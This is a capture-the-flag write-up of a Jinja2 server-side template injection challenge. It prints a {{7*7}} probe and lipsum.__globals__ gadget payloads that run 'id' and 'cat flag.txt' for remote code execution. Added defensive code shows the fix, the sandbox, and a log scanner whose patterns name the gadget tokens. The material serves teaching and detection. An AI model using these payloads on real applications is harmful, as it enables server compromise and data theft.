Secret (Web)

While testing the input field, I noticed that whatever I typed into it was echoed back in the response. This is a sign that the application might be directly rendering our input inside a server-side template.

To test this hypothesis, I sent the basic SSTI probe payload {{7*7}}.

The result came back as 49, which confirmed that our input was indeed being evaluated by a template engine — in this case, Jinja2, which is commonly used in Python web applications like Flask.
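As an added illustration (this is not code from the original writeup or from the challenge), the snippet below shows how a Python view ends up with exactly this bug: the request parameter is concatenated into the Jinja2 template source, so Jinja2 parses whatever the user typed. It then shows the two fixes a defender would apply: keep the template static and pass the input as context data, and, where user-supplied template source is unavoidable, render it in Jinja2's sandbox, which refuses the dunder attribute access that the lipsum gadget depends on. The function names and the `name` parameter are assumptions for illustration; only the `jinja2` package is needed.

```python
"""Added example (not from the original writeup): why user input inside a
Jinja2 template source is evaluated, and two mitigations. Function names and
the `name` parameter are hypothetical."""
from jinja2 import Environment, Template
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Vulnerable pattern: the request parameter becomes part of the template
# SOURCE, so template syntax inside it is parsed and evaluated by Jinja2.
def greet_vulnerable(name: str) -> str:
    return Template("Hello " + name).render()

# Fix 1: keep the template static and pass the parameter as CONTEXT data.
# Jinja2 then treats it as an ordinary string; autoescaping also covers XSS.
SAFE_ENV = Environment(autoescape=True)

def greet_fixed(name: str) -> str:
    return SAFE_ENV.from_string("Hello {{ name }}").render(name=name)

# Fix 2 (defence in depth): if user-controlled template source is a hard
# requirement, render it in the sandbox. The sandbox rejects attribute
# lookups such as __globals__ and __class__, which the gadget chains need.
SANDBOX = SandboxedEnvironment(autoescape=True)

def render_in_sandbox(template_source: str) -> str:
    try:
        return SANDBOX.from_string(template_source).render()
    except SecurityError as exc:
        return f"blocked: {exc}"

if __name__ == "__main__":
    probe = "{{7*7}}"
    print(greet_vulnerable(probe))   # Hello 49   <- input was evaluated
    print(greet_fixed(probe))        # Hello {{7*7}}   <- input stayed data
    print(render_in_sandbox('{{ lipsum.__globals__["os"] }}'))  # blocked: ...
```

The first fix is the real one: data belongs in the render context, never in the template string. The sandbox is a second layer, not a substitute; arithmetic such as `{{7*7}}` still evaluates inside it, so a sandboxed endpoint still leaks the fact that it is a template engine.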

With that confirmed, the next step was to escalate from simple expression evaluation to remote code execution.

I used the following payload from PayloadAllTheThings to execute a system command:

{{ lipsum.__globals__["os"].popen('id').read() }}

This worked — the response contained the output of the id command, proving that we had RCE.

The next step was to run ls to list files and find where the flag was stored:

This revealed flag.txt, so I simply ran:

{{ lipsum.__globals__["os"].popen("cat flag.txt").read() }}
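From the detection side, the probe and the gadget chain used in this writeup are both easy to spot in web access logs once the query string is URL-decoded. The following stdlib-only scanner is an added example (not part of the original writeup): it flags template-expression syntax and the attribute and function names that the public Jinja2 gadgets rely on, and scores each request so an analyst can separate a `{{7*7}}` probe from an actual command-execution attempt. The log lines are constructed for the example, and the combined-log-format layout is an assumption.

```python
"""Added example (not from the original writeup): scan access logs for SSTI
probes and Jinja2 gadget chains. Log lines are constructed; the log format
(request line in double quotes, client IP first) is an assumption."""
import re
from urllib.parse import unquote_plus

# Expression delimiters of the common template engines; catches {{7*7}}-style probes.
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|<%.*?%>", re.S)

# Names that appear in the public Jinja2 RCE gadgets (the lipsum chain above
# among them). Two or more of these in one parameter is a strong indicator.
GADGET_TOKENS = re.compile(
    r"__(?:globals|class|mro|subclasses|builtins|import)__"
    r"|\b(?:popen|os\.system|subprocess|cycler|joiner|lipsum)\b"
)

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Constructed sample log: a benign request, a probe, the gadget chain, a static file.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?name=alice HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 510
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /?name=%7B%7B+lipsum.__globals__%5B%22os%22%5D.popen%28%27id%27%29.read%28%29+%7D%7D HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /static/app.js HTTP/1.1" 200 2048
"""

def score_request(raw_path: str) -> tuple[int, list[str]]:
    """Return (score, reasons) for one raw request path including its query string."""
    decoded = unquote_plus(raw_path)  # attackers percent-encode the braces
    reasons = []
    if TEMPLATE_EXPR.search(decoded):
        reasons.append("template expression syntax")
    found = sorted(set(GADGET_TOKENS.findall(decoded)))
    if found:
        reasons.append("gadget tokens: " + ", ".join(found))
    # One point per indicator, plus a bonus when several gadget names co-occur,
    # so a bare probe scores 1 and an execution attempt scores well above it.
    score = len(reasons) + (2 if len(found) >= 2 else 0)
    return score, reasons

def scan_log(log_text: str, threshold: int = 1) -> list[dict]:
    """Return one alert dict per request whose score reaches the threshold."""
    alerts = []
    for line in log_text.splitlines():
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        score, reasons = score_request(match.group("path"))
        if score >= threshold:
            alerts.append({
                "client": line.split()[0],
                "path": unquote_plus(match.group("path")),
                "score": score,
                "reasons": reasons,
            })
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["score"], alert["client"], alert["path"], alert["reasons"])
```

Because the gadget names are checked after URL decoding, the rule is not defeated by percent-encoding the braces or dunder names. A 200 response with a body size that differs from the usual page for the same path (compare the probe's 510 bytes with the benign 512) is a useful secondary signal that the expression was actually evaluated rather than reflected.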
